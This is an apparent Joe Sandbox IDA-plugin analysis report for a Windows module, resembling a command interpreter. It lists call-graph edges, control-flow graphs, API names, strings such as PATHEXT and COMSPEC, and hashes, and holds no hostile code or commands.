7ff7e1dcca07 18450 7ff7e1dde91c 198 API calls 18449->18450 18455 7ff7e1dcca0c 18450->18455 18451 7ff7e1ddbfec 176 API calls 18452 7ff7e1dcc9f1 18451->18452 18453 7ff7e1db3240 166 API calls 18452->18453 18453->18449 18454 7ff7e1dbcf33 memset 18454->18474 18455->18346 18456 7ff7e1dbca40 17 API calls 18456->18474 18457 7ff7e1dbd184 wcschr 18457->18474 18459 7ff7e1dcc9c9 18461 7ff7e1dc855c ??_V@YAXPEAX 18459->18461 
18460 7ff7e1dbd1a7 wcschr 18460->18474 18461->18463 18463->18426 18464 7ff7e1dc0a6c 273 API calls 18464->18474 18465 7ff7e1dbbe00 635 API calls 18465->18474 18466 7ff7e1dc3448 166 API calls 18466->18474 18467 7ff7e1dbcfab _wcsicmp 18467->18474 18468 7ff7e1dc0580 12 API calls 18469 7ff7e1dbd003 GetConsoleOutputCP GetCPInfo 18468->18469 18470 7ff7e1dc04f4 3 API calls 18469->18470 18470->18474 18472 7ff7e1dc1fac 238 API calls 18472->18474 18473 7ff7e1dbd044 ??_V@YAXPEAX 18473->18474 18474->18427 18474->18435 18474->18438 18474->18442 18474->18445 18474->18447 18474->18454 18474->18456 18474->18457 18474->18459 18474->18460 18474->18463 18474->18464 18474->18465 18474->18466 18474->18467 18474->18468 18474->18472 18474->18473 18515 7ff7e1dc0494 18474->18515 18528 7ff7e1dbdf60 18474->18528 18548 7ff7e1ddbfec 18474->18548 18584 7ff7e1dd778c 18474->18584 18615 7ff7e1ddc738 18474->18615 18476 7ff7e1dcb6e2 RevertToSelf CloseHandle 18475->18476 18477 7ff7e1db96c8 18475->18477 18478 7ff7e1db96ce 18477->18478 18479 7ff7e1db6a48 184 API calls 18477->18479 18478->18346 18479->18477 18481 7ff7e1dc596c 18480->18481 18485 7ff7e1dc5a12 18480->18485 18482 7ff7e1dc598d VirtualQuery 18481->18482 18481->18485 18484 7ff7e1dc59ad 18482->18484 18482->18485 18483 7ff7e1dc59b7 VirtualQuery 18483->18484 18483->18485 18484->18483 18484->18485 18485->18346 18487 7ff7e1dde954 18486->18487 18488 7ff7e1dde990 18486->18488 18489 7ff7e1ddee88 390 API calls 18487->18489 18490 7ff7e1dde9b4 197 API calls 18488->18490 18491 7ff7e1dde964 18489->18491 18492 7ff7e1dde995 longjmp 18490->18492 18491->18488 18493 7ff7e1db96b4 186 API calls 18491->18493 18493->18491 18495 7ff7e1dd76a3 18494->18495 18496 7ff7e1dd76b7 18495->18496 18497 7ff7e1db96b4 186 API calls 18495->18497 18498 7ff7e1dde9b4 197 API calls 18496->18498 18497->18495 18499 7ff7e1dd76bc longjmp 18498->18499 18501 7ff7e1dc9324 malloc 18500->18501 18502 7ff7e1dc2e7b 18501->18502 18503 7ff7e1dc2e83 memset 18502->18503 18504 7ff7e1dc2e90 18502->18504 
18503->18504 18504->18409 18506 7ff7e1dc2da3 18505->18506 18507 7ff7e1dc2d89 18505->18507 18506->18507 18508 7ff7e1dc2dbc GetProcessHeap RtlFreeHeap 18506->18508 18510 7ff7e1dc21af 18507->18510 18511 7ff7e1dc2e0c 18507->18511 18508->18506 18508->18507 18510->18412 18512 7ff7e1dc2e11 18511->18512 18513 7ff7e1dc2e32 18511->18513 18512->18513 18514 7ff7e1dce494 VirtualFree 18512->18514 18513->18507 18517 7ff7e1dc04a4 18515->18517 18516 7ff7e1dc26e0 19 API calls 18516->18517 18517->18516 18518 7ff7e1dc04b9 _get_osfhandle SetFilePointer 18517->18518 18519 7ff7e1dcd845 18517->18519 18520 7ff7e1dcd839 18517->18520 18522 7ff7e1db3278 166 API calls 18517->18522 18518->18474 18521 7ff7e1ddf1d8 166 API calls 18519->18521 18523 7ff7e1db3278 166 API calls 18520->18523 18525 7ff7e1dcd837 18521->18525 18524 7ff7e1dcd819 _getch 18522->18524 18523->18525 18524->18517 18526 7ff7e1dcd832 18524->18526 18634 7ff7e1ddbde4 EnterCriticalSection LeaveCriticalSection 18526->18634 18529 7ff7e1dbdfe2 18528->18529 18530 7ff7e1dbdf93 18528->18530 18532 7ff7e1dbe00b _setjmp 18529->18532 18533 7ff7e1dbe100 VirtualFree 18529->18533 18530->18529 18531 7ff7e1dbdf9f GetProcessHeap RtlFreeHeap 18530->18531 18531->18529 18531->18530 18534 7ff7e1dbe04a 18532->18534 18542 7ff7e1dbe0c3 18532->18542 18533->18529 18635 7ff7e1dbe600 18534->18635 18536 7ff7e1dbe073 18537 7ff7e1dbe081 18536->18537 18538 7ff7e1dbe0e0 longjmp 18536->18538 18644 7ff7e1dbd250 18537->18644 18540 7ff7e1dbe0b0 18538->18540 18540->18542 18675 7ff7e1ddd3fc 18540->18675 18542->18441 18545 7ff7e1dbe600 473 API calls 18546 7ff7e1dbe0a7 18545->18546 18546->18540 18547 7ff7e1ddd610 167 API calls 18546->18547 18547->18540 18549 7ff7e1ddc036 18548->18549 18550 7ff7e1ddc047 18548->18550 18551 7ff7e1db3240 166 API calls 18549->18551 18552 7ff7e1ddc6db 18550->18552 18555 7ff7e1ddc067 18550->18555 18558 7ff7e1dc3448 166 API calls 18550->18558 18553 7ff7e1ddc042 18551->18553 18554 7ff7e1dc8f80 7 API calls 18552->18554 18967 7ff7e1dc58e4 
EnterCriticalSection LeaveCriticalSection 18553->18967 18557 7ff7e1ddc6eb 18554->18557 18559 7ff7e1dc081c 166 API calls 18555->18559 18561 7ff7e1ddc070 18555->18561 18557->18474 18558->18555 18559->18561 18560 7ff7e1dc417c 166 API calls 18562 7ff7e1ddc0d1 18560->18562 18561->18560 18968 7ff7e1ddbf84 18562->18968 18565 7ff7e1ddc673 18566 7ff7e1dc33f0 _vsnwprintf 18565->18566 18567 7ff7e1ddc696 18566->18567 18569 7ff7e1dc34a0 166 API calls 18567->18569 18568 7ff7e1ddc1c5 towupper 18570 7ff7e1ddc11a 18568->18570 18571 7ff7e1ddc6ce 18569->18571 18570->18567 18570->18568 18572 7ff7e1dc33f0 _vsnwprintf 18570->18572 18573 7ff7e1dc3140 166 API calls 18570->18573 18575 7ff7e1db6ee4 166 API calls 18570->18575 18578 7ff7e1ddc2db GetDriveTypeW 18570->18578 18579 7ff7e1dc33f0 _vsnwprintf 18570->18579 18581 7ff7e1ddc3ab 18570->18581 18972 7ff7e1db586c GetVersion 18570->18972 18977 7ff7e1dc885c FormatMessageW 18570->18977 18571->18552 18978 7ff7e1dc58e4 EnterCriticalSection LeaveCriticalSection 18571->18978 18572->18570 18573->18570 18575->18570 18578->18570 18580 7ff7e1ddc5c8 LocalFree 18579->18580 18580->18570 18582 7ff7e1dc33f0 _vsnwprintf 18581->18582 18583 7ff7e1ddc3bd 18582->18583 18583->18474 18592 7ff7e1dd77bc 18584->18592 18585 7ff7e1dd79c0 18597 7ff7e1dc34a0 166 API calls 18585->18597 18586 7ff7e1dd7aca 18587 7ff7e1dc34a0 166 API calls 18586->18587 18590 7ff7e1dd7adb 18587->18590 18589 7ff7e1dd7ab5 18596 7ff7e1dc3448 166 API calls 18589->18596 18594 7ff7e1dd7af0 18590->18594 18598 7ff7e1dc3448 166 API calls 18590->18598 18591 7ff7e1dd7984 18591->18585 18595 7ff7e1dd7989 18591->18595 18592->18585 18592->18586 18592->18589 18592->18591 18593 7ff7e1dd7a00 18592->18593 18592->18595 18605 7ff7e1dd79ef 18592->18605 18609 7ff7e1dc3448 166 API calls 18592->18609 18611 7ff7e1dd778c 166 API calls 18592->18611 18601 7ff7e1dd7a0b 18593->18601 18593->18605 18612 7ff7e1dd7a33 18593->18612 18599 7ff7e1dd778c 166 API calls 18594->18599 18595->18605 18986 7ff7e1dd76e0 18595->18986 
18596->18605 18600 7ff7e1dd79d6 18597->18600 18598->18594 18602 7ff7e1dd7afb 18599->18602 18603 7ff7e1dc3448 166 API calls 18600->18603 18614 7ff7e1dd79e7 18600->18614 18601->18605 18606 7ff7e1dc34a0 166 API calls 18601->18606 18602->18595 18607 7ff7e1dc3448 166 API calls 18602->18607 18603->18614 18605->18474 18610 7ff7e1dd7a23 18606->18610 18607->18595 18608 7ff7e1dc3448 166 API calls 18608->18605 18609->18592 18613 7ff7e1dd778c 166 API calls 18610->18613 18611->18592 18612->18608 18613->18614 18982 7ff7e1dd7730 18614->18982 18616 7ff7e1ddc775 18615->18616 18623 7ff7e1ddc7ab 18615->18623 18617 7ff7e1dbcd90 166 API calls 18616->18617 18619 7ff7e1ddc781 18617->18619 18618 7ff7e1ddc8d4 18618->18474 18619->18618 18620 7ff7e1dbb0d8 194 API calls 18619->18620 18620->18618 18621 7ff7e1dbb6b0 170 API calls 18621->18623 18622 7ff7e1dbb038 _dup2 18622->18623 18623->18618 18623->18619 18623->18621 18623->18622 18624 7ff7e1dbd208 _close 18623->18624 18624->18623 18626 7ff7e1ddd63d 18625->18626 18632 7ff7e1ddd635 18625->18632 18627 7ff7e1ddd658 18626->18627 18628 7ff7e1ddd64a 18626->18628 18627->18632 18633 7ff7e1db3278 166 API calls 18627->18633 18629 7ff7e1db3278 166 API calls 18628->18629 18629->18632 18630 7ff7e1ddd672 longjmp 18631 7ff7e1dcc9da 18630->18631 18631->18449 18631->18451 18632->18630 18632->18631 18633->18632 18636 7ff7e1dbe60f 18635->18636 18693 7ff7e1dbef40 18636->18693 18638 7ff7e1dbe626 18639 7ff7e1dcccca longjmp 18638->18639 18640 7ff7e1dbe637 18638->18640 18639->18640 18641 7ff7e1dc3448 166 API calls 18640->18641 18642 7ff7e1dbe65f 18640->18642 18643 7ff7e1dcccfe 18641->18643 18642->18536 18643->18536 18645 7ff7e1dbd267 18644->18645 18650 7ff7e1dbd2d3 18644->18650 18646 7ff7e1dbd284 _wcsicmp 18645->18646 18651 7ff7e1dbd2a6 18645->18651 18647 7ff7e1dbd32b 18646->18647 18646->18651 18649 7ff7e1dbe600 473 API calls 18647->18649 18647->18651 18648 7ff7e1dbe600 473 API calls 18648->18650 18649->18647 18650->18645 18650->18648 18652 7ff7e1dbd305 18650->18652 
18653 7ff7e1dbd316 18651->18653 18654 7ff7e1dbef40 472 API calls 18651->18654 18652->18653 18655 7ff7e1dbe600 473 API calls 18652->18655 18653->18540 18653->18545 18661 7ff7e1dbedf8 18654->18661 18655->18645 18656 7ff7e1dcd0a2 longjmp 18657 7ff7e1dcd0c5 18656->18657 18658 7ff7e1dc3448 166 API calls 18657->18658 18659 7ff7e1dcd0d4 18658->18659 18660 7ff7e1dbeece 18660->18653 18664 7ff7e1dbcd90 166 API calls 18660->18664 18661->18656 18661->18657 18662 7ff7e1dbee68 18661->18662 18669 7ff7e1dbeeb1 18661->18669 18663 7ff7e1dbef40 472 API calls 18662->18663 18663->18653 18665 7ff7e1dbeee7 18664->18665 18667 7ff7e1dbef31 18665->18667 18668 7ff7e1dbeeef 18665->18668 18666 7ff7e1dbe600 473 API calls 18666->18669 18671 7ff7e1dde91c 198 API calls 18667->18671 18670 7ff7e1dbe600 473 API calls 18668->18670 18669->18660 18669->18666 18672 7ff7e1dbeec2 18669->18672 18670->18653 18673 7ff7e1dbef36 18671->18673 18674 7ff7e1dbef40 472 API calls 18672->18674 18673->18656 18674->18660 18691 7ff7e1ddd419 18675->18691 18676 7ff7e1dccadf 18677 7ff7e1ddd576 18678 7ff7e1ddd592 18677->18678 18690 7ff7e1ddd555 18677->18690 18680 7ff7e1dc3448 166 API calls 18678->18680 18679 7ff7e1ddd5c4 18682 7ff7e1dc3448 166 API calls 18679->18682 18684 7ff7e1ddd5a5 18680->18684 18681 7ff7e1ddd541 18681->18678 18687 7ff7e1ddd546 18681->18687 18682->18676 18685 7ff7e1ddd5ba 18684->18685 18688 7ff7e1dc3448 166 API calls 18684->18688 18937 7ff7e1ddd36c 18685->18937 18686 7ff7e1dc3448 166 API calls 18686->18691 18687->18679 18687->18690 18688->18685 18944 7ff7e1ddd31c 18690->18944 18691->18676 18691->18677 18691->18678 18691->18679 18691->18681 18691->18686 18691->18690 18692 7ff7e1ddd3fc 166 API calls 18691->18692 18692->18691 18694 7ff7e1dbef71 18693->18694 18695 7ff7e1dcd1f3 18694->18695 18696 7ff7e1dbf130 18694->18696 18703 7ff7e1dbef87 18694->18703 18695->18638 18697 7ff7e1dc3448 166 API calls 18696->18697 18724 7ff7e1dbf046 18696->18724 18697->18724 18698 7ff7e1dbf433 18725 7ff7e1dbf8c0 
EnterCriticalSection LeaveCriticalSection 18698->18725 18699 7ff7e1dbf438 18699->18724 18778 7ff7e1dbf860 18699->18778 18701 7ff7e1dbeff2 iswspace 18701->18703 18704 7ff7e1dbf01f wcschr 18701->18704 18703->18695 18703->18698 18703->18699 18703->18701 18703->18704 18703->18724 18704->18724 18705 7ff7e1dbf860 456 API calls 18705->18724 18706 7ff7e1dbf0c4 iswdigit 18706->18724 18707 7ff7e1dbf1b7 iswspace 18707->18706 18710 7ff7e1dbf1ce wcschr 18707->18710 18708 7ff7e1dbf1fc iswdigit 18708->18724 18709 7ff7e1dbf558 iswspace 18711 7ff7e1dbf6cd wcschr 18709->18711 18709->18724 18710->18706 18710->18708 18711->18724 18712 7ff7e1dbf8c0 456 API calls 18712->18724 18713 7ff7e1dcd1df 18714 7ff7e1db3278 166 API calls 18713->18714 18714->18695 18715 7ff7e1dbf860 456 API calls 18716 7ff7e1dbf632 iswspace 18715->18716 18717 7ff7e1dbf648 wcschr 18716->18717 18716->18724 18718 7ff7e1dbf65f iswdigit 18717->18718 18717->18724 18718->18724 18719 7ff7e1dbf32f iswspace 18721 7ff7e1dbf342 wcschr 18719->18721 18719->18724 18720 7ff7e1dbf2b8 iswdigit 18720->18724 18721->18720 18721->18724 18722 7ff7e1dbf3d2 iswspace 18723 7ff7e1dbf3e9 wcschr 18722->18723 18722->18724 18723->18724 18724->18638 18724->18705 18724->18706 18724->18707 18724->18708 18724->18709 18724->18712 18724->18713 18724->18715 18724->18719 18724->18720 18724->18722 18749 7ff7e1dbf934 18725->18749 18726 7ff7e1dbf94a EnterCriticalSection LeaveCriticalSection 18730 7ff7e1dbf994 _get_osfhandle 18726->18730 18726->18749 18727 7ff7e1dbfb46 18783 7ff7e1dbfc30 GetProcessHeap HeapAlloc 18727->18783 18728 7ff7e1db3240 166 API calls 18728->18749 18729 7ff7e1ddbfec 176 API calls 18729->18749 18732 7ff7e1dc0010 9 API calls 18730->18732 18732->18749 18734 7ff7e1dbfb52 18734->18699 18735 7ff7e1dcd3fa EnterCriticalSection LeaveCriticalSection longjmp 18735->18749 18736 7ff7e1dbfbe6 GetLastError 18754 7ff7e1dbfa42 18736->18754 18737 7ff7e1dcd388 _get_osfhandle 18739 7ff7e1dc0010 9 API calls 18737->18739 18738 7ff7e1dc01b8 6 API calls 
18738->18749 18739->18749 18740 7ff7e1dcd3b6 GetLastError 18740->18749 18740->18754 18741 7ff7e1dde9b4 197 API calls 18742 7ff7e1dcd474 longjmp 18741->18742 18742->18749 18743 7ff7e1dcd2ac 18819 7ff7e1ddbf2c _get_osfhandle 18743->18819 18744 7ff7e1dcd2c7 EnterCriticalSection LeaveCriticalSection _get_osfhandle 18746 7ff7e1dd7f00 357 API calls 18744->18746 18746->18749 18747 7ff7e1dbfa80 wcschr 18747->18749 18748 7ff7e1dcd32e GetLastError 18748->18749 18749->18726 18749->18727 18749->18728 18749->18729 18749->18730 18749->18735 18749->18736 18749->18737 18749->18738 18749->18740 18749->18741 18749->18743 18749->18744 18749->18747 18749->18748 18750 7ff7e1dc3448 166 API calls 18749->18750 18751 7ff7e1dc3448 166 API calls 18749->18751 18753 7ff7e1dbfbd4 18749->18753 18749->18754 18755 7ff7e1dbfaf0 18749->18755 18818 7ff7e1ddf318 _get_osfhandle GetFileType 18749->18818 18752 7ff7e1dcd34d longjmp 18750->18752 18751->18749 18752->18749 18753->18727 18761 7ff7e1dbfbe1 18753->18761 18754->18699 18756 7ff7e1dc01b8 6 API calls 18755->18756 18757 7ff7e1dbfb0a 18756->18757 18757->18727 18760 7ff7e1dbfb0e _get_osfhandle SetFilePointer 18757->18760 18758 7ff7e1dcd4ee 18759 7ff7e1db3278 166 API calls 18758->18759 18765 7ff7e1dcd4fb 18759->18765 18760->18727 18766 7ff7e1dcd533 18760->18766 18761->18758 18762 7ff7e1dcd4dd 18761->18762 18763 7ff7e1ddbfec 176 API calls 18761->18763 18764 7ff7e1db3278 166 API calls 18762->18764 18767 7ff7e1dcd4c9 18763->18767 18768 7ff7e1dcd4e9 18764->18768 18769 7ff7e1dcd514 longjmp 18765->18769 18772 7ff7e1dc01b8 6 API calls 18765->18772 18766->18727 18774 7ff7e1dc34a0 166 API calls 18766->18774 18770 7ff7e1dc3448 166 API calls 18767->18770 18771 7ff7e1dde91c 198 API calls 18768->18771 18769->18754 18773 7ff7e1dcd4d1 18770->18773 18771->18758 18775 7ff7e1dcd50b 18772->18775 18776 7ff7e1dc3448 166 API calls 18773->18776 18774->18727 18775->18769 18824 7ff7e1ddf4a8 18775->18824 18776->18762 18781 7ff7e1dbf871 18778->18781 18779 7ff7e1dbf8c0 456 API 
calls 18782 7ff7e1dcd203 18779->18782 18780 7ff7e1dbf881 18780->18724 18781->18779 18781->18780 18784 7ff7e1dbfc6a 18783->18784 18785 7ff7e1dcd55c 18783->18785 18786 7ff7e1dcd571 memset longjmp 18784->18786 18801 7ff7e1dbfca2 18784->18801 18787 7ff7e1db3278 166 API calls 18785->18787 18789 7ff7e1dbfce7 18786->18789 18788 7ff7e1dcd566 18787->18788 18788->18786 18789->18734 18790 7ff7e1dbfd73 18791 7ff7e1dbfd99 18790->18791 18792 7ff7e1dcd638 18790->18792 18793 7ff7e1dbff70 2 API calls 18791->18793 18794 7ff7e1db3278 166 API calls 18792->18794 18796 7ff7e1dbfda1 18793->18796 18795 7ff7e1dcd64c 18794->18795 18797 7ff7e1dbff70 2 API calls 18795->18797 18796->18734 18798 7ff7e1dcd654 longjmp 18797->18798 18802 7ff7e1dbff4f 18798->18802 18801->18789 18801->18790 18801->18801 18801->18802 18803 7ff7e1dcd609 18801->18803 18809 7ff7e1dcd5b5 memmove 18801->18809 18832 7ff7e1dc18d4 18801->18832 18906 7ff7e1dbd840 GetProcessHeap HeapAlloc 18801->18906 18804 7ff7e1dcd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18802->18804 18806 7ff7e1dc0167 MultiByteToWideChar 18802->18806 18807 7ff7e1dc0131 SetFilePointer 18802->18807 18805 7ff7e1db3278 166 API calls 18803->18805 18812 7ff7e1dc0190 18804->18812 18810 7ff7e1dcd615 18805->18810 18806->18812 18807->18802 18811 7ff7e1db3278 166 API calls 18809->18811 18813 7ff7e1dbff70 2 API calls 18810->18813 18814 7ff7e1dcd5e6 18811->18814 18812->18734 18815 7ff7e1dcd61f longjmp 18813->18815 18816 7ff7e1dbff70 2 API calls 18814->18816 18815->18792 18817 7ff7e1dcd5f0 longjmp 18816->18817 18817->18803 18818->18749 18820 7ff7e1dd8450 367 API calls 18819->18820 18822 7ff7e1ddbf59 18820->18822 18821 7ff7e1ddbf6b GetLastError 18822->18821 18823 7ff7e1ddbf62 18822->18823 18823->18754 18825 7ff7e1ddf4c1 GetStdHandle 18824->18825 18826 7ff7e1dd8450 367 API calls 18825->18826 18827 7ff7e1ddf4ea 18826->18827 18828 7ff7e1ddf4ee wcschr 18827->18828 18829 7ff7e1ddf509 18827->18829 18828->18825 18828->18829 18830 7ff7e1dc8f80 7 API calls 
18829->18830 18831 7ff7e1ddf519 18830->18831 18831->18769 18833 7ff7e1dc1935 18832->18833 18834 7ff7e1dc193b 18832->18834 18833->18834 18835 7ff7e1dc19a1 18833->18835 18836 7ff7e1dc195a 18834->18836 18837 7ff7e1dc1946 wcsrchr 18834->18837 18839 7ff7e1dc2e44 memset malloc 18835->18839 18879 7ff7e1dcdbda 18835->18879 18838 7ff7e1dc8f80 7 API calls 18836->18838 18837->18836 18841 7ff7e1dc1978 18838->18841 18859 7ff7e1dc19cf 18839->18859 18840 7ff7e1dcdbdf longjmp 18842 7ff7e1dcdbf3 ??_V@YAXPEAX 18840->18842 18841->18801 18843 7ff7e1dcdbff ??_V@YAXPEAX 18842->18843 18843->18836 18844 7ff7e1dc1a21 18847 7ff7e1dcdc3c wcschr 18844->18847 18848 7ff7e1dc1a3c wcsrchr 18844->18848 18856 7ff7e1dc1dfe 18844->18856 18845 7ff7e1dc19f3 towlower wcsrchr 18845->18844 18846 7ff7e1dc1af6 wcsrchr 18845->18846 18852 7ff7e1dc1b11 towlower 18846->18852 18846->18856 18850 7ff7e1dcdcd2 18847->18850 18851 7ff7e1dcdc5d 18847->18851 18849 7ff7e1dc1a54 wcsrchr 18848->18849 18848->18856 18849->18850 18853 7ff7e1dc1a71 18849->18853 18850->18843 18855 7ff7e1db3278 166 API calls 18850->18855 18854 7ff7e1dbcd90 166 API calls 18851->18854 18852->18856 18852->18859 18862 7ff7e1dbb900 166 API calls 18853->18862 18869 7ff7e1dc1a95 18853->18869 18865 7ff7e1dcdc75 18854->18865 18858 7ff7e1dcdcef longjmp 18855->18858 18856->18847 18856->18850 18857 7ff7e1dc1d74 18857->18836 18866 7ff7e1dc1d7d ??_V@YAXPEAX 18857->18866 18861 7ff7e1dcdd03 18858->18861 18859->18844 18859->18845 18859->18856 18859->18879 18860 7ff7e1dcdccd 18860->18843 18867 7ff7e1dcdd3b 18861->18867 18868 7ff7e1dcdd0c SearchPathW 18861->18868 18862->18869 18863 7ff7e1dc1acf 18870 7ff7e1dbb900 166 API calls 18863->18870 18864 7ff7e1dc1b64 18864->18861 18872 7ff7e1dc1b76 GetFullPathNameW 18864->18872 18871 7ff7e1dc3a90 170 API calls 18865->18871 18865->18879 18866->18836 18876 7ff7e1dcdd5c wcsrchr 18867->18876 18868->18867 18869->18857 18869->18863 18869->18864 18869->18879 18873 7ff7e1dc1ad7 ??_V@YAXPEAX 18870->18873 18874 7ff7e1dcdc98 
18871->18874 18875 7ff7e1dc2978 13 API calls 18872->18875 18873->18836 18877 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18874->18877 18878 7ff7e1dc1ba7 wcsrchr 18875->18878 18881 7ff7e1dcdd73 18876->18881 18877->18879 18878->18876 18880 7ff7e1dc1bc9 18878->18880 18879->18836 18879->18840 18879->18860 18880->18857 18882 7ff7e1dc1bda memset 18880->18882 18883 7ff7e1dcdd8c 18881->18883 18884 7ff7e1dcdd78 longjmp 18881->18884 18885 7ff7e1dbca40 17 API calls 18882->18885 18883->18842 18883->18843 18884->18883 18886 7ff7e1dc1c23 18885->18886 18886->18881 18887 7ff7e1dcdda8 GetFileAttributesExW 18886->18887 18899 7ff7e1dc1c4f 18886->18899 18888 7ff7e1dcdfd0 18887->18888 18890 7ff7e1dcddc5 18887->18890 18888->18801 18889 7ff7e1dbb900 166 API calls 18891 7ff7e1dc1d52 18889->18891 18892 7ff7e1dcdf34 18890->18892 18896 7ff7e1dd85d0 8 API calls 18890->18896 18891->18857 18895 7ff7e1dc1d68 ??_V@YAXPEAX 18891->18895 18897 7ff7e1dcdf4d 18892->18897 18892->18899 18893 7ff7e1dc1d09 18893->18889 18894 7ff7e1dce035 18893->18894 18895->18857 18898 7ff7e1dcde3f 18896->18898 18900 7ff7e1de08ec 9 API calls 18897->18900 18902 7ff7e1db6ee4 166 API calls 18898->18902 18899->18856 18899->18893 18901 7ff7e1dc1cd8 wcsrchr 18899->18901 18900->18888 18901->18894 18903 7ff7e1dc1cf5 18901->18903 18904 7ff7e1dcdeb6 18902->18904 18903->18856 18903->18893 18905 7ff7e1dc3140 166 API calls 18904->18905 18905->18892 18907 7ff7e1dbd8b5 18906->18907 18908 7ff7e1dbdefa 18906->18908 18910 7ff7e1dbdf04 18907->18910 18912 7ff7e1dbd8e5 18907->18912 18909 7ff7e1db3278 166 API calls 18908->18909 18909->18910 18911 7ff7e1dbdf15 longjmp 18910->18911 18936 7ff7e1dbda67 18910->18936 18911->18936 18915 7ff7e1dbd94d GetProcessHeap HeapAlloc 18912->18915 18916 7ff7e1dbdeb6 18912->18916 18912->18936 18913 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18914 7ff7e1dbdf34 18913->18914 18917 7ff7e1dbff70 GetProcessHeap RtlFreeHeap 18914->18917 18915->18916 18926 7ff7e1dbd97c 18915->18926 18918 7ff7e1db3278 166 API calls 18916->18918 
                                                      [Call-graph edge data, continued from the preceding lines; the original page rendered it as an image. The remaining nodes cover string and registry helpers (wcstol, _wcsnicmp, memmove, longjmp, malloc, _vsnwprintf, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, wcschr, wcsrchr) and the module's CRT start-up path beginning at 7ff7e1dc8d80 (Sleep, _amsg_exit, _initterm, _IsNonwritableInCurrentImage, GetCurrentThreadId, OpenThread, HeapSetInformation, GetThreadLocale, VirtualQuery, GetConsoleOutputCP, GetCPInfo, memset, _setjmp, _setmode, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, GetProcAddress, SetThreadLocale).]
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                      • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                      • API String ID: 3305344409-4288247545
                                                      • Opcode ID: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                      • Instruction ID: 792d6073e1623914c260ae244dc1910add6848bb42fc3424631bdf3e8537c91b
                                                      • Opcode Fuzzy Hash: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
                                                      • Instruction Fuzzy Hash: C342F665A08A8285EB14EB1198023B9E7A1FF85794FC44A32DD1E877D4DFBCE144C3A2

                                                      Control-flow Graph

                                                      [Control-flow graph of the function at 7ff7e1dbaa54 (with a non-executed tail at 7ff7e1dcbbac-7ff7e1dcbf70); the original page rendered it as an image with executed and not-executed blocks colour-coded. Besides internal helpers, its basic blocks call wcschr, towlower, _wcsnicmp, iswxdigit, iswdigit, iswspace, memset and wcsrchr.]
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                      • String ID: :$:$:$:ON$OFF
                                                      • API String ID: 972821348-467788257
                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction ID: f7e4fc3e9d10e990a3eb59c9c5e60b5983400714d21d22fa8d52f268e6204d51
                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction Fuzzy Hash: 22229F21E0864296EB28FF2595163B9E691FF49B81FC88437C90E47394DFBCE444C7A2

                                                      Control-flow Graph

                                                      [Control-flow graph of the function at 7ff7e1dc51ec; the original page rendered it as an image with executed and not-executed blocks colour-coded. The function is a chain of GetLocaleInfoW calls (the fall-through blocks at 7ff7e1dcef32-7ff7e1dcf23e supply defaults when a query fails) ending in setlocale and a call to the internal helper at 7ff7e1dc8f80.]
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
